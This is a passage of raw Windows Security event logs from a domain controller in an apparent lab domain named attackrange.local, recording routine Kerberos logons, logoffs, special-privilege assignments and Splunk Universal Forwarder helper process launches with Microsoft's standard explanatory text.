The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:17:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264520
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x824C57
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:18:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264524
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bb8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:18:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264523
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xffc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:18:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264526
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b04
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:18:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264525
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf38
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:18:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264527
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1138
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:18:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264529
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1808
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:18:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264528
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1160
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264532
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82867F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264531
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x82867F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62742
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264530
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82867F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264544
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1890
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264543
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828B3D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264542
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828C2B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264541
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828C73
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264540
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x828CE5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62747
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264539
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828CE5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264538
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x828C73
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62746
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264537
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828C73
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264536
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x828C2B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264535
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828C2B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264534
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x828B3D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62745
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264533
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828B3D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:19:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264545
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264547
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17d4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
